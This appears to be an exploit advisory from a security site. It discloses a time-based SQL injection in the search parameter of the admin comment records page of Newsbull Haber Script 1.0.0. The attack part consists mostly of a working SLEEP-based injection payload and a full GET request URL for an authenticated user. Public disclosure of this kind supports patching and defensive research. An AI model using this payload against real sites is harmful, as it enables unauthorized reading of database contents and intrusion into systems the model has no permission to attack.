Newsbull Haber Script - SQL Injection (Time Based)

2019.01.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################################### # Exploit Title: Newsbull Haber Script - SQL Injection (Time Based) # Dork: N/A # Date: 28-01-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://newsbull.org/ # Software Link: https://github.com/gurkanuzunca/newsbull # Version: 1.0.0 # Category: Webapps # Tested on: Wampp @Win # CVE: N/A #################################################################### # Vulnerabilities # For the SQL injection to be applied, the user must log in. # Running the injection command in the POC section will display the db data. # The proof of the deficit is in the link below. # https://i.hizliresim.com/zj0Q77.jpg #################################################################### # POC - SQLi (Time Based) # Parameters : search # Attack Pattern : -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' # GET Request : http://localhost/[PATH]/admin/comment/records?userId=1&search=1'[SQL] # URL : http://localhost/[PATH]/admin/comment/records?userId=1&search=-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top